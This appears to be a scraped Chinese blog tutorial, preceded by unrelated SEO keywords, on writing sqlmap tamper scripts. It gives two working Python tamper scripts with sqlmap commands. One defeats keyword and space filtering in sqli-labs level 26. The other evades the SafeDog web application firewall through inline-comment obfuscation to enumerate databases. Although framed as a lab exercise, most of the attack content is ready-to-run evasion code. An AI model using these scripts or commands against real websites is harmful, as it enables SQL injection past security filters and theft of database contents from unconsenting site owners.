网站建设验收书,深圳网站的公司,企业融资的10种方法,wordpress的分类目录文章目录 tamper脚本是什么#xff1f;指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么#xff1f; SQLMap 是一款SQL注入神器#xff0c;可以通过tamper 对注入payload 进行编码和变形#xff0c;以达到绕过某些限制的目的。但是有些时候#xff0c;SQLM… 文章目录 tamper脚本是什么指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么 SQLMap 是一款SQL注入神器可以通过tamper 对注入payload 进行编码和变形以达到绕过某些限制的目的。但是有些时候SQLMap 自带的Tamper 脚本并不是特别好用需要根据实际情况定制Tamper 脚本。 sqlmap的编写语言也是pythontamper脚本能增强sqlmap的功能达到绕过检测的目的。
指定tamper脚本运行sqlmap
在kali中用下面命令查找sqlmap所在的目录
find / -name sqlmap如图查找成功 下面是一个简单的tamper脚本它将关键字#、and、or和空格都做了替换and、or双写大小写绕过加上(?i)忽略大小写以sqli-labs第26关为例经过测试这关会过滤空格and、or和空格需要做双写和大小写绕过
import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):space %a0and anANDd-- and 1or oORrpayload re.sub(r(?i)#, and 1,payload)payload re.sub(r(?i)and,anANDd,payload)payload re.sub(r(?i)or,oORr,payload)payload re.sub(r(?i)\ ,%a0,payload)return payload将这段代码放入一个sqli-labs_26.py中并将文件放到sqlmap所在的目录
运行xampp打开sqli-labs_26复制路径 然后在kali中输入下面命令运行sqlmap -tamper指定运行的tamper脚本 –current-db列出当前数据库 -u指定url -v 指定sqlmap的回显等级 –dbs 列出所有的数据库 python3 sqlmap -u http://10.9.75.164/sqli-labs/Less-26/?id2 -v3 -tamper sqli-labs_26.py --current-db如下图获取到数据库的名称为security类型为联合查询 安全狗绕过tamper脚本 绕过安全狗 1.脏数据 2.大小写转换 3.双写 4.内联注释 安装安全狗以sqli-labs第1关为例绕过安全狗应该从上面4个方面考虑经过测试只有第四个方法可行下面是一个内联注释的脚本
import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): payload re.sub(r(?i)and, /*!14400and*/, payload)payload re.sub(r(?i)order by, /**/order/*/%0a*a*/by/**/, payload)payload re.sub(r(?i)union select, union/*!88888cas*//*/%0a*a*/select/**/, payload) payload re.sub(r(?i)union all select, union/*!88888cas*//*/%0a*a*/select/**/, payload)payload re.sub(r(?i)from information_schema.schemata, /*!from--%0f/*%0ainformation_schema.schemata*/, payload)payload re.sub(r(?i)from information_schema.tables, /*!from--%0f/*%0ainformation_schema.tables*/, payload)payload re.sub(r(?i)from information_schema.columns, /*!from--%0f/*%0ainformation_schema.columns*/, payload)payload re.sub(r(?i)database\(\), database(/*!/*/**%0fAJEST*/*/), payload)#payload re.sub(r(?i)count\(*\),count(1),payload)payload re.sub(r(?i) as,/*!14400as*/,payload)payload re.sub(r(?i)char,/*!14400char*/,payload)return payload和之前获取数据库名称一样将该脚本文件放到sqlmap所在目录下: 然后用下面命令运行sqlmap获取数据库名称
python3 sqlmap -u http://10.9.75.116/sqli-labs/Less-1/?id1 -v3 --tamper safedog.py --random-agent --dbs如图用该脚本文件做tamper绕过安全狗绕waf成功获得数据库名称